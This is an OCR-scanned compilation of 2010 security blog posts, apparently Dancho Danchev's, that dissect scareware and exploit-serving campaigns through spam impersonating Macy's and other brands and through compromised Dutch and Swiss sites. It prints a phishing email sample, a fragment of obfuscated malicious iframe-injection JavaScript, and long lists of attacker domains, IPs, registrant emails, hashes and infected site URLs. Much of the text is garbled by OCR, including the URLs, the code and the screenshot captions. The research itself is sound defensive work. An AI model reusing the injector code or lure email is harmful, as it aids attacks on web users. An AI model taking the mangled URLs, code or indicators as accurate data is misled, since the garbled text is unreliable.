10. [18]lmage Gallery: The (European) Antivirus market - current trends 

11. [19]Google tops comparative review of malicious search results 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him 
[21]on Twitter. 


. http://blogs.zdnet.com/securit 


ttp://ddanchev.blogspot.com/2010/07/summarizing-zero-days-posts-for-june.htm 


. http: //ddanchev.blogspot .com/2010/05/summarizing-zero-days-posts-for-may.html 


ttp://www.zdnet .com/topics/danchotdanchev?o=1kmode=rss&tag=mantle_skin; content 


. http: //feeds.feedburner.com/zdnet/securit 


ttp://www.zdnet .com/blog/security/does-microsofts- shar ing-of-source-code-with-china-and-russia-pose-a-se 


urity-risk/6789 


ttp://www.zdnet.com/blog/security/middle-east-countries-the-blackberry-is-a-national-security-threat/694 


ttp://www.zdnet.com/blog/security/report-apple-had-the-most-vulnerabilities-throughout-2005- 2010/6801 


.zdnet .com/photos/image-gallery-avast-antivirus-office-in-prague-czech-republic/45063 


.zdnet .com/photos/image-gallery-introduction-to-avast-antivirus-version-51/450981 


.zdnet .com/photos/image-gallery-the-european-antivirus-market-current-trends/451006 


.zdnet .com/blog/security/google-tops-comparative-review-of-malicious-search-results/7009 


20. http://ddanchev.blogspot.com/ 
21. http://twitter.com/danchodanche 
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6.8.2 Spamvertised Best Buy, Macy’s, Evite and Target Themed Scareware/Exploits 
Serving Campaign (2010-08-09 14:19) 


System Tasks —) Local Disc (C:) —) Local Disc (D:) 


View system information ? 32 trojans 


x6) Add or remove programs re ) 
(B Change a settings DVD 3 DVD-RAM (F:) aa Shared Documents 


x Security threat 


Other Places System errors detected. To prevent data lost system scanning is started 
©] My Network Places — 
Q My Documents Object: C:\WINDOWS\system32\append.exe 
kag tired on eerrs a3) Hardware and security errors detected 
Control Panel = 
Hardware errors 


Perfomance of your PC is low due to a file system error. It was caused by the 
; changes malicious software made in your system files and numerous open ports used 
Details by spyware to transfer your privacy data. Your personal data safety in danger. 


My Computer Privacy information errors 

System Folder Spyware has stolen your personal information. 

You can see the contents of the stolen block below: 
Country: Netherlands 

IP Address: 


Remove all 


They are back again ({1]Spamvertised Amazon "Verify Your Email", "Your Amazon Order" 
Malicious Emails; [2]Dissecting the Xerox WorkCentre Pro Scanned Document Themed 
Campaign ) for a fresh start of the week, with a currently ongoing spam campaign, serving 
scareware and client-side exploits, using a "Thank you for your payment"/"Thank you for your 
EXPRESS payment" themed subjects impersonating popular brands such as Best Buy, Macy’s, 
Target and Evite. 


Let’s dissect the campaign, its structure, emphasize on the monetization strategy, and 
expose the complete portfolio of the domains involved in the campaign. 


Sample email: 
"Subject :Thank you for your payment Don’t miss a thing - Add support@e.macys.com to your 
email address book! Click here if you are unable to see images in this email. 


1. Sign in on macys.com at https://www.macys.com/myinfo/index.ognc 

2. Click on “My Account” - “My Profile” at https://www.macys.com/myinfo/profile/index.ognc 
3. Uncheck the box Receive email notification when statements are available to view online 
and when payments are due. 

4, Click on “Update Profile” 

5. Expect the change to take place in 3 days 

©2009 macys.com Inc., 685 Market Street, Suite 800, San Francisco, CA 94105. All rights 
reserved." 


Compared to previous campaigns, the directory structure (fast fluxed :8080/index.php?pid=10; 
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maliciousurl.ru /QWERTY.js; maliciousurl.ru /ODBC.js; LAN.js; Access.js; End User.js etc.) 
of this one remains virtually the same, depending, of course, on the angle you choose for 
dissecting it. 


var Kkeitv3327mc; 
function Ujupasciiwi(){ 


if (typeof(document.body) == ‘object’){ 
clearInterval(Kkcifv3327mc); 
yelse{ 
return true; 
} 
Rbfy99bajc = "; 
TdiSskl = [‘sre’,'h<e<imamh9tz’ replace(/[2\<9mB]/g, "), 'wBiadztzh(' .replace(/[\(za\?B)/a, "“)]; 
function B4agypea0r7(Q35af46qq,Uzmpyx6,Kg2j4qxd){ 
return Q35af46gq.setAttribute(Uzmpyx6,Kg2j4qxd); 
} 
function ¥Vinbq7hifekp(D1ikjtzicc){ 
return document.createElement(Dikjtzicc); 
} 
Dym3s2di1gq = 'p'; 
Riyr73h9y = window.frames.length; 
if (Riyr73h9y¥<20) Dym3s2digq = ‘i;f?r|a?m>e?' replace(/[\7\>;Z\|]/9, "); 
UyimSqhmbg = 'US'; 
BtlwtOgl = '1255149731'; 
ajo} = ‘http , php?Gd6p904xgimn=Lkpid=1&Gd6 xg8mn='"+Riyr73h9y; 
Ianrzofznm4g = 852832836; 
Ko093rg = Vmbq7hifckpt'div'); 
Ko093rg.id = 'Fw24ir4b'; 
KoO093rg.name = 'Fw241ir4b'; 
Ianrzofznm4g -= 426416418*2; 
document.body.appendChild({Ko093rq); 
Mmu42rqfn = ‘lanrzofznm4g'; 
wkifvli = new Array(J8xra47qajoj, lanrzofznm4g,lanrzofznm4g); 
Ayj9ud4mws61 = document.createElement(Dvm3s2diq); 
for (YplugpS in TdiSskl){ 


Sample campaign structure: 

- musicsgeneva.com /x.html - "PLEASE WAITING 4 SECOND..." 

- opus22.org /x.html - "PLEASE WAITING 4 SECOND..." 

- shamelessfreegift.com /x.html - "PLEASE WAITING 4 SECOND..." 

- physicianschoiceonline.com /x.htm - "PLEASE WAITING 4 SECOND..." 

- baymediagroup .com:8080/index.php?pid=10 - client-side exploits - 188.165.95.133; 
188.165.192.106; 91.121.108.61; 94.23.60.106; 178.32.5.233 - Email: fo@bigmailbox.ru 

- hoopdotami.cz .cc/scanner5/?afid=24 - 188.72.192.229 - scareware monetization 


- Detection rate: 
antivirus 24.exe - [3]Trojan.Win32.FraudPack.berg - Result: 16/42 (38.1 %) 
File size: 166912 bytes 
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MD5...: b3cd297c654d3be52ffeb5f6a5ff13b4 
SHAI..: bae889dd8ac7b22ec5f5649d6e0c073c8e2119d5 


Upon execution, the sample phones back to: 


httpsstarss.in /httpss/v=40 &step=2 &hostid= - 188.72.226.154 - Email: | stevieks- 
baiz@hotmail.com 
httpstatsconfig.com /getfile.php?r= = - 204.12.226.173 - Email: httpstatscon- 


fig.com@evoprivacy.com 


desktopsecurity2010Itd.com 


desktopsecuritycorp.com 
httpstatscontig.com 
nsl.desktopsecurity2010itd.com 
nsl.desktopsecuritycorp.com 


ns1.httpstatsconfig.com —NEE_g 204.12.192.0/18 ——4S-ge AS32097 


ns2.desktopsecurity2010Itd.com 

ns2.desktopsecuritycorp.com 

ns2.httpstatsconfig.com 
startsecureplace.com 


www.desktopsecurity2010Itd.com 


Responding to 204.12.226.173 are also: 
nsl.desktopsecurity2010ltd.com - Email: sixtakidlt2@hotmail.com 
ns2.desktopsecurity2010ltd.com 
www.desktopsecurity2010ltd.com 

httpstatsconfig.com 

ns1.httpstatsconfig.com 

ns2.httpstatsconfig.com 

desktopsecuritycorp.com 

nsl.desktopsecuritycorp.com 

ns2.desktopsecuritycorp.com 


Domains using the same name server, nsl.freedomen.info - 209.85.99.32 - Email: 
mail@vetaxa.com 
adsonlineinc.com - 66.96.239.86 
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picmonde.com - 94.228.220.93 

bonblogger.com - 94.228.220.93 

h2fastpornpics.com - 94.228.220.93 

celebsfinectpics.com - 94.228.209.133 - Email: temp.for.loan@gmail.com 
celebsfreeimages.com - 94.228.209.134 - Email: hannigey233@hotmail.com 
picindividuals.com - 94.228.220.93 

picbloggerprojet.com - 94.228.220.93 

httpsstarss.in 

hippocounter.info - 96.9.177.21 

genesisbeta.net - 94.228.220.94 


Name servers of notice: 
nsl.getyourdns.com - 194.79.88.121 
ns2.getyourdns.com - 77.68.52.52 
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ns3.getyourdns.com - 87.98.149.171 

ns4.getyourdns.com - 66.185.162.248 

ns1l.instantdnsserver.com - 194.79.88.121 - Email: depot@infotorrent.ru 
ns2.instantdnsserver.com - 77.68.52.52 

ns3.instantdnsserver.com - 87.98.149.171 

ns4.instantdnsserver.com - 66.185.162.248 


Client-side exploits serving domains part of the campaign: 
aquaticwrap.ru - Email: vibes@freenetbox.ru 
aroundpiano.ru - Email: vibes@freenetbox.ru 
baybear.ru - Email: vibes@freenetbox.ru 
baymediagroup.com - Email: fo@bigmailbox.ru 
bayjail.ru - Email: bushy@bigmailbox.ru 
betaguy.ru - Email: vibes@freenetbox.ru 
blockoctopus.ru - Email: semi@freenetbox.ru 
budgetdude.ru - Email: totem@freenetbox.ru 
chaoticice.ru - Email: vibes@freenetbox.ru 
clannut.ru - Email: totem@freenetbox.ru 
clockledge.ru - Email: totem@freenetbox.ru 
coldboy.ru - Email: totem@freenetbox.ru 
countryme.ru - Email: totem@freenetbox.ru 
dayemail.ru - Email: totem@freenetbox.ru 
diseasednoodle.ru - Email: vibes@freenetbox.ru 
discountprowatch.com - Email: bike@fastermail.ru 
dyehill.ru - Email: angles@fastermail.ru 
easychurch.ru - Email: vibes@freenetbox.ru 
economypoet.ru - Email: semi@freenetbox.ru 
envirodollars.ru - Email: vibes@freenetbox.ru 
forhomessale.ru - Email: dull@freemailbox.ru 
galacticstall.ru - Email: vibes@freenetbox.ru 
getyourdns.com - Email: fo@bigmailbox.ru 
hairyartist.ru - Email: vibes@freenetbox.ru 
lonelyzero.ru - Email: vibes@freenetbox.ru 
lovingmug.ru - Email: vibes@freenetbox.ru 
lowermatch.ru - Email: vibes@freenetbox.ru 
luckyfan.ru - Email: vibes@freenetbox.ru 
malepad.ru - Email: semi@freenetbox.ru 
matchsearch.ru - Email: semi@freenetbox.ru 
microlightning.ru - Email: vibes@freenetbox.ru 
mindbat.ru - Email: semi@freenetbox.ru 
mealpoets.ru - Email: totem@freenetbox.ru 
nutcountry.ru - Email: dying@qx8.ru 
obscurewax.ru - Email: vibes@freenetbox.ru 
oceanobject.ru - Email: semi@freenetbox.ru 
parkperson.ru - Email: semi@freenetbox.ru 
penarea.ru - Email: dying@qx8.ru 

ponybug.ru - Email: dying@qx8.ru 
pocketbloke.ru - Email: angles@fastermail.ru 
programability.ru - Email: dying@qx8.ru 
rancideye.ru - Email: vibes@freenetbox.ru 
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rawscent.ru - Email: vibes@freenetbox.ru 
recordsquare.ru - Email: totem@freenetbox.ru 
rescuedtoilet.ru - Email: vibes@freenetbox.ru 
riotassistance.ru - Email: angles@fastermail.ru 
scarletpole.ru - Email: vibes@freenetbox.ru 
secondgain.ru - Email: vibes@freenetbox.ru 
shortrib.ru - Email: vibes@freenetbox.ru 
slaveperfume.ru - Email: totem@freenetbox.ru 
sodacells.ru - Email: dying@qx8.ru 
smelldrip.ru - Email: totem@freenetbox.ru 
starvingarctic.ru - Email: vibes@freenetbox.ru 
stagepause.ru - Email: totem@freenetbox.ru 
sweatymilk.ru - Email: vibes@freenetbox.ru 
tartonion.ru - Email: vibes@freenetbox.ru 
tunemug.ru - Email: tips@freenetbox.ru 
wearyratio.ru - Email: vibes@freenetbox.ru 
yummyeyes.ru - Email: vibes@freenetbox.ru 


UPDATED: Thursday, August 12, 2010: Historical OSINT for client-side exploit serving 
domains part of Gumblar’s campaigns for April/May 2010 using hostdnssite.com (Email: 
cop@qx8.ru) name server: 

bestdarkman.info - Email: wwww@qx8.ru 
bestwebclub.info - Email: asleep@5mx.ru 
buyfootjoy.info - Email: mellow@5mx.ru 
carswebnet.info - Email: mynah@freenetbox.ru 
cityrealtimes.info - Email: asleep@5mx.ru 
clandarkguide.info - Email: mellow@5mx.ru 
clandarksky.info - Email: wwww@qx8.ru 
darkangelcam.info - Email: mellow@5mx.ru 
darkbluecoast.info - Email: wwww@qx8.ru 
darksidenetwork.info - Email: mellow@5mx.ru 
digitaljoyworld.info - Email: mellow@5mx.ru 
eroomsite.info - Email: feint@qx8.ru 

esunsite.info - Email: wwww@qx8.ru 
extrafreeweb.info - Email: mynah@freenetbox.ru 
feedandstream.info - Email: mynah@freenetbox.ru 
gloomyblack.info - Email: wwww@qx8.ru 
homesweetrv.info - Email: mynah@freenetbox.ru 
indiawebnet.info - Email: mynah@freenetbox.ru 
joylifein.info - Email: mellow@5mx.ru 
joysportsworld.info - Email: mellow@5mx.ru 
justroomate.info - Email: feint@qx8.ru 
kenjoyworld.info - Email: mellow@5mx.ru 
learnwebguide.info - Email: mynah@freenetbox.ru 
luxurygenuine.info - Email: asleep@5mx.ru 
myfeedsite.info - Email: feint@qx8.ru 
newsuntour.info - Email: wwww@qx8.ru 
oneroomhome.info - Email: feint@qx8.ru 
realshoponline.info - Email: asleep@5mx.ru 
redsunpark.info - Email: feint@qx8.ru 
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roomstoretexas.info - Email: feint@qx8.ru 
suncoastatlas.info - Email: feint@qx8.ru 
sunstarvideo.info - Email: feint@qx8.ru 
supersunbeds.info - Email: feint@qx8.ru 
superwebworld.info - Email: asleep@5mx.ru 
sweetpeapots.info - Email: mynah@freenetbox.ru 
sweetteenzone.info - Email: mynah@freenetbox.ru 
thedarkwaters.info - Email: wwww@qx8.ru 
thejoydiet.info - Email: mellow@5mx.ru 
therealclamp.info - Email: drum@maillife.ru 
thesunchaser.info - Email: wwww@qx8.ru 
thesweetchild.info - Email: mynah@freenetbox.ru 
theultimateweb.info - Email: asleep@5mx.ru 
theyellowsun.info - Email: feint@qx8.ru 
webguidetv.info - Email: asleep@5mx.ru 
webnetenglish.info - Email: mynah@freenetbox.ru 
yourprintroom.info - Email: feint@qx8.ru 
yoursweetteen.info - Email: mynah@freenetbox.ru 
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nfidesyi Bearcntorcoer gous Seawch 
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' rxnetpremium 
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Message # GO Search SO co anced 
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UPDATED: Friday, August 13, 2010: 
The use of Yahoo Groups is _ still ongoing. Sample URL: groups.yahoo 
:com/group/nfldcsyi/message which includes a link to perfectpillcool .com:8080. 


The campaign is ongoing, updates will be posted as soon as new developments emerge. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him 
[5]Jon Twitter. 


1, tap: / /danchev, blogspot con/2010/07/spanvertieed-anazon-vorify-you-enail, Hal 
2, http://adanchev blogspot, con/2010/07 /dissecting-reror-vorkcentre-pro-scanned. hia 

3 
4, http://adanchev blogspot coal 

5, hetp://eviteer.con/danchodanchey 


6.8.3 Dissecting a Scareware-Serving Black Hat SEO Campaign Using Compromised 
:NL/.CH Sites (2010-08-13 17:09) 


Hard Drive Antivirus scanner a 
a Documents ‘ Local Disk (C:) ~ Local Disk (D:) 
e re | ———— 
& Pictures — = = Gy 3 
e @ 6 infected files @ 5 infected files 
Music 
4 Recently Changed Windows Security a 
FP earcnres ~ 
BB Pubic x] Antivirus Protection Disabled 
Threat Name Threat type Threat Level 
@ Win32.HLLM.Netsky.35328 Vrus High a 
@ Win32/Spy.Ursnif.A Virus High 
@ Trojan.DownLoad.37236 Virus High 
@ Packed. Vuntid!gen2 Virus Medium 
@ Trojan-Downloader.Win32.Lipler.bkue Virus Critical v 
Recommended: Cick "Erase infected" to erase all infected and Erase infected 
suspicious files and make your system protected. 


“IE 7.0 


wk Operation system:Windows Vista 


Over the past week, I’ve been tracking - among the countless number of campaigns currently 
in process of getting profiled/taken care of internally - a blackhat SEO campaign that’s persis- 
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tently compromising legitimate sites within small ISPs in the Netherlands and Switzerland, for 
scareware-serving purposes. 


Although this beneath the radar targeting approach is nothing new, it once again emphasizes 
on a well proven mentality within the cybercrime ecosystem - collectively the hundreds 
of thousands of low profile sites, if well poisoned with bogus/timely/relevant blackhat SEO 
content, can outpace the hijacked traffic from a high profile site due to the shorter time frame 
it would take for the the administrators to clean it up/ quicker community members’ reaction 
based on prioritization due to the importance of the site. 


What's particularly interesting about the campaign, is the fact that the redirectors/scareware 
domains were previously parked within our "dear friends at AS31252, STARNET-AS StarNet 
Moldova. Go through related posts on STARNET-AS StarNet Moldova: 


¢ [1]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
¢ [2]Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 


¢ [3]Koobface Gang Responds to the "10 Things You Didn’t Know About the Koobface Gang 
Post" 


¢ [4]From the Koobface Gang with Scareware Serving Compromised Sites 


Let’s dissect the campaign, expose the complete portfolio of scareware/redirector domains, 
emphasize on the monetization vector and how this blackhat SEO campaign is using the same 
scareware affiliate network like the one campaigns launched through Gumblar’s infrastructure 
([5]Spamvertised Best Buy, Macy’s, Evite and Target Themed Scareware/Exploits Serving 
Campaign) continue using. 


Once the self.location.href = condition is met, the following redirectors take place, until 
the user is exposed to the ubiquitous "You're infected" screen: 


- dotyuzcifl.ru/liq/?st= - 200.63.44.211 - Email: kireev@ravermail.com (NS: 
ns1.freemobiledns.mobi Email: akornl1022@gmail.com) 

- errgxhxzerr.co.cc/r/feed.php?k= - 200.63.44.211, AS27716, ASEVELOZ - Email: andrew 
_bush52@hotmail.com 

- errgxhxzerr.co.cc/tube/?k= 

- errgxhxzerr.co.cc/r/sss.php 

- www4.protection-guard89.co.cc - 74.118.193.81, AS46664 - Email: abc.emm@gmail.com 
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- www1.virus-detection50.co.cc/?p=p52 - 94.228.220.117, AS47869, NETROUTING-AS - Email: 
abc.emm@gmail.com 


- Detection rate: 

packupdate9 289.exe - [6]Win32/TrojanDownloader.FakeAlert.AEY - 6/ 42 (14.3 %) 
MD5 : 3e4920aa3ff24db64372ae96854f3f02 

SHA1 : 75bcb6acf5ff65269bfc5f685e5d03688b8blade 

SHA256: 7272f889520cd1d1898ccd91f1b01835cf53f06b452041baae03367 96ff09fd7 


Responding to 994.228.220.117, AS47869, NETROUTING-AS are also the following domains: 
www 1.virus-detection50.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www 1.virus-detection51.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www1.virus-detection52.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www1.virus-detection53.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www 1.virus-detection54.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www 1.virus-detection55.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www 1.virus-detection56.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www1.virus-detection57.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www1.virus-detection58.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www 1.virus-detection59.co.cc/?p=p52 - Email: abc.emm@gmail.com 
www2.mypersonalshield70.in - Email: gkook@checkjemail.nl 
www2.mypersonalshield71.in - Email: gkook@checkjemail.nl 
www2.mypersonalshield72.in - Email: gkook@checkjemail.nl 


It gets even more interesting, and cybercrime ecosystem-friendly, when we see that one of 
the scareware redirector domains, has been registered with the same email as the scareware 
domain redirector used in the monetization vector of Gumblar’s campaigns. 


The currently used uramozat.cz.cc /scanner10/?afid=76 - 195.16.88.62, AS50109, HOSTLIFE- 
AS WIBO PROJECT LLC - Email: ydeconspi@nice-4u.com is registered using the same 
email as the recently used hoopdotami.cz .cc/scanner5/?afid=24 - 188.72.192.229 - Email: 
ydeconspi@nice-4u.com from the "[7]Spamvertised Best Buy, Macy’s, Evite and Target 
Themed Scareware/Exploits Serving Campaign". 


This centralization of monetization networks ultimately serves best the security industry 
and law enforcement, and remains a trend rather than a fad. 


Responding to 195.16.88.62 are also the following affiliate redirector domains: 
sulphomihin.cz.cc - Email: ydeconspi@nice-4u.com 
suppcorfoke.cz.cc - Email: ydeconspi@nice-4u.com 
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swinumlobzua.cz.cc - Email: ydeconspi@nice-4u.com 
taitretarjus.cz.cc - Email: ydeconspi@nice-4u.com 
talinighge.cz.cc - Email: ydeconspi@nice-4u.com 
tangmomawigg.cz.cc - Email: ydeconspi@nice-4u.com 
taniverwea.cz.cc - Email: ydeconspi@nice-4u.com 
tedroidragin.cz.cc - Email: ydeconspi@nice-4u.com 
tifucacel.cz.cc - Email: ydeconspi@nice-4u.com 
ungelacoc.cz.cc - Email: ydeconspi@nice-4u.com 
unriprazzhalf.cz.cc - Email: ydeconspi@nice-4u.com 
uramozat.cz.cc - Email: ydeconspi@nice-4u.com 
vochicorneu.cz.cc - Email: ydeconspi@nice-4u.com 
voihuavino.cz.cc - Email: ydeconspi@nice-4u.com 
voldcafuri.cz.cc - Email: ydeconspi@nice-4u.com 
weineitronty.cz.cc - Email: ydeconspi@nice-4u.com 
wintotersstal.cz.cc - Email: ydeconspi@nice-4u.com 
worddreamelpa.cz.cc - Email: ydeconspi@nice-4u.com 
wordrochosom.cz.cc - Email: ydeconspi@nice-4u.com 
xboxunechin.cz.cc - Email: ydeconspi@nice-4u.com 
ydeconspi.cz.cc - Email: ydeconspi@nice-4u.com 
zilrebelma.cz.cc - Email: ydeconspi@nice-4u.com 
zukavito.cz.cc - Email: ydeconspi@nice-4u.com 


¢ [8] Complete list of URLs for the compromised Dutch sites (NOW CLEAN) hosted at 
AS6461, MFNX MEN - Metromedia Fiber Network 


Complete list of the URLs for compromised sites (CURRENTLY ACTIVE) hosted at AS15547, 
TVS2NET-NETPLUS Servicing cable-network customer in CH. 
abitasion.ch /illucpUWAeima 

abitasion.ch /ilOeUSbRtm/ 

abmontage.ch /73NJub8iWea/ 

absteam.ch /UfHZI8Qm7/ 
accueiletpartagesuisse.ch /WbVcOfiHlabe/ 
accueiletpartagesuisse.ch /Wbytpauohcjk/ 
adikt-a.ch /isisAuMOImMXW/ 

adikt-a.ch /isIWcgUV7L/ 

adsite.ch /IAULixdSoWmA/ 

adumas.ch /QVxaomZ7er 

aemo-valais.ch /ualagow/ 
aerobic-chablais.ch /[YMy3lAejmiq/ 
aerobic-chablais.ch /[YuMW8yH)/ 
a-fauchere.ch /rU8alutON/ 
agpinstallations.ch /WAoxnHauvyUi/ 
agpinstallations.ch /WAwANoXv9rek/ 
alayra.ch /ufgMxORjbNz9i/ 

alex-xxxl.ch /“u9VUyo9hw/ 

alpirama.ch /A0Sc3lu/ 

alterfamiliae.ch /RgaulMVZ/ 

ametys.ch /IZ2ebIxoL3tSN/ 

ametys.ch /IZbAaYy/ 
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amis-orgue-moudon.ch /WulatdWMbRSg/ 
amis-orgue-moudon.ch /WuYUoH3/ 
apf-hev-fr.ch /drkoUqjx/ 

artdidier.ch /VZkKR7ap2gQiAU/ 
artefax.ch /u80oApWua/ 

artefax.ch /u8qrYoi8ASh/ 
artisanatbramoisien.ch /jRVAEWyXqLsM/ 
artisane.ch /Scg3lEv/ 
artisan-fondeur.ch /RXOy9OdUu/ 
artist-e.ch /j8WfilEa/ 

asb-coaching.ch /uJWOldHeuai/ 
atelier-bois.ch /skJunOelUgM8/ 
ateliercube.ch /3bqNHnLy/ 
attoufoula-al-baria.ch /scWZHiblemAqr/ 
autoecole-sion.ch /kuWcUM3yn9xgo/ 
aux-doigts-de-fee.ch /eooVapJNWcuHx/ 
auxpetitsbois.ch /8OxlaoWeydbc7/ 
avof.ch /xr3t0uvanegb/ 

avmep.ch /niyW3RHiaoE/ 

avmep.ch /nizXOdumW/ 
avosbagages.ch /ebaAuynxel2L/ 
avta.ch /ZuOVoixA/ 
banques-assurances.ch /WEeyt7iUYL/ 
batibois.ch /hgAbavx/ 

batibois.ch /hghkyUNO9/ 
bconseils.ch /tAlUzJVn/ 
bc-production.ch /9XupRmIbE/ 
bdelfolie.ch /ushj20miJW9wu/ 
bdelfolie.ch /usiUomaYfWeN/ 
becoval.ch /aVUqW9xYbp/ 
bedat-conseils.ch /AUyYRtuhWrpA/ 
belfid.ch /ftRbtgl3/ 
bellodelledonne.ch /oXOkUuN/ 
bellodelledonne.ch /oXoNgekf7i/ 
bestwear.ch /jOiyeJ3v/ 

bienecrire.ch /YAE9ldiakvy/ 
biocave.ch /AuhuwoAUxOI3W/ 
birman.ch /Z7MoeVXgAafL/ 
blanchival.ch /ANabQIigk0zeO/ 
blanchival.ch /ANJjIQgHb/ 
bnbmorel.ch /yfE3AyWoQx8/ 
bonnes-occases.ch /HIYMhcE/ 
bouquins.ch /IWHOdAa/ 

cafepsy.ch /ZoiAcIWIRM/ 
calzolarorocco.ch /9a8aYRjIrW/ 
camping-sedunum.ch /SvvMQjsem/ 
canadulce.ch /wullMriaN/ 
canadulce.ch /wuQYryJ/ 

carrgeiger.ch /ehsVy2uXxoAWE/ 
carte-menu.ch /JQinNyA/ 
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castalie.ch /cq3xeyWmjaf/ 
catherineritter.ch /AdUJiRq/ 
catherineritter.ch /AdUqRAiSnNsyv/ 
cavedegoubing.ch /ERNzcuQ9iagdo/ 
cave-des-chevalieres.ch /WuunyOq/ 
celinerenaud.ch /Qj7dHcLo/ 
celinerenaud.ch /QjZoUyajJ/ 
centre-autos.ch /INUYRuWnA/ 
cere-sa.ch /lyEHdVqAIYbXL/ 
cere-sa.ch /lyknW)Jr/ 

cgt.ch /egAaVUfne/ 
chalets-for-sale.ch /SaNXWcvU/ 
chavaz-archi.ch /8iAZxEaJ/ 
chavaz-archi.ch /8iQOjIS/ 
cretillons.ch /ianeZc2/ 


Responding to 200.63.44.211 (the original [9]redirector domains dotyuzcifl.ru; errgx- 
hxzerr.co.cc), AS27716, ASEVELOZ Eveloz are the remaining domains part of the scare- 
ware/redirection/Fake Adobe Player (tube/Adobe __ Flash __Player.exe) campaign. 


- Detection rate: 

Adobe __ Flash ___Playerexe - [10]Heuristic.BehavesLike.Win32.Suspicious.H - 11/ 42 (26.2 %) 
MD5 : 8a10909c487a739e85028a19ale898dc 

SHA1 : d9f7d78fe245f8df04fa398835b52d5a2c2d6af7 

SHA256: 63befe78a7895a8efc6d893491d8f7 7ef8adalcd52d562587490a79f29b65336 


- Upon execution phones back to: 

qualattice.com - 64.20.63.58 - Email: trougn@mobiletonight.com 

jaxcage.net - 91.188.60.233, [11]AS6851, BKCNET "SIA" IZZI - Email: delee@easteroffers.com 
mybubblebean.com - = 85.234.190.47, [12]AS6851, BKCNET "SIA" IZZI - Email: 
place@popupquote.com 

freejaxbird.net - 77.78.239.42 - Email: delee@easteroffers.com 


07tqqwem.ru - Email: pishkov@rbcmail.ru 
Oqhe7y6o.ru - Email: pishkov@rbcmail.ru 
Ost44x7z.ru - Email: stroganov@mail.ru 
Ow6scx6a.ru - Email: goncharov@rapworld.com 
20xzpzga.ru - Email: danilov@boatnerd.com 
23qjmdic.ru - Email: lebedev@rapworld.com 
28iue5ri.ru - Email: kireev@bgay.com 
28jnbuak.ru - Email: kirillov@ravermail.com 
2poaxz3k.ru - Email: alekseev@land.ru 
2tmo2baz2.ru - Email: kustov@remixer.com 
30zcz8ot.ru - Email: slabkov@bigmailbox.net 
32iafdnp.ru - Email: erohin@intimatefire.com 
3aQ0stbge.ru - Email: golodnikov@blida.info 
3jruf6nc.ru - Email: taranov@inorbit.com 
40ktc2tn.ru - Email: antonov@insurer.com 
4hp2ag6c.ru - Email: belov@kidrock.com 
4mausx2w.ru - Email: lavrov@blackcity.net 
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4y8pqcby.ru - Email: pokatilov@realtyagent.com 
5eqq3sgj.ru - Email: abakumov@smtp.ru 

5gsco2w5.ru - Email: davidov@bikermail.com 
5q4eyd2w.ru - Email: stepanov@pop3.ru 

5znhff2s.ru - Email: kalinin@boarderzone.com 
60jj8sks.ru - Email: patralov@bigheavyworld.com 
6pgsqndh.ru - Email: baklanov@mail333.com 
83qndvnj.ru - Email: taranov@relapsecult.com 
868r5e0b.ru - Email: udalov@rastamall.com 

8n7pnyyr.ru - Email: patralov@front.ru 

8reclame.ru - Email: kirikov@billssite.com 

atyyyopg.ru - Email: viktorov@bikerheaven.net 
azaamdwo.ru - Email: samsonov@bikermail.com 
bvo62o00i.ru - Email: kirillov@rastamall.com 

c28xd2ck.ru - Email: luzgin@front.ru 

cf8sagkn.ru - Email: alekseev@ratedx.net 

ckmdbrio.ru - Email: ulyanov@rapworld.com 
crosslinks-services.ru - Email: ekomasov@kidrock.com 
csokolom.ru - Email: kirikov@irow.com 

cw5k47ye.ru - Email: viktorov@bicycling.com 
duz5n2ca.ru - Email: belov@billssite.com 

dwunvuum.ru - Email: stepanov@pop3.ru 

ea7xh4vw.ru - Email: goncharov@repairman.com 
err39hxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err3ghxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err5phxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err61hxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err6ehxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err6jhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err8jhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
err8whxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errb9hxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errbehxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errbqhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errcihxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errdhhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errekhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errfdhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errgqhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errgthxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errguhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
errgvhxzerr.co.cc - Email: andrew _bush52@hotmail.com 
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gerotal. info 


i¢nhjopf.ru 
i7in0b64.ru 


200, 


jimmplum 
jimmthebest1 .ru 


jnanoSgh.ru 


200, 

200, 

nder.ru 200, 
liononlinensd.ru 


lokipol.ru 
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mibims?m.ru 
mrtOzqcb.ru 


f50rbdb8.ru - Email: samsonov@kidrock.com 
fbbktj2z.ru - Email: zhukov@kidrock.com 
fimpvs8t.ru - Email: zhuraviev@blackvault.com 
fppf2h28.ru - Email: danilov@pochta.ru 
gayq8rgx.ru - Email: kovalev@blackcity.net 
geavdwal.info 

gerotal.info 

gztyue8w.ru - Email: kirillov@boatnerd.com 
h6poe6or.ru - Email: beglov@inorbit.com 
hc6zxms4.ru - Email: lebedev@intimatefire.com 
hem3oxjh.ru - Email: ulyanov@boarderzone.com 
hszwwvjq.ru - Email: kustov@fromru.com 
i2wv8rdm.ru - Email: shedrin@billssite.com 
i4nhjopf.ru - Email: antonov@fromru.com 
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i7in0Ob64.ru - Email: ulyanov@kinkyemail.com 
ihbkbzcm.ru - Email: abdulov@iname.com 
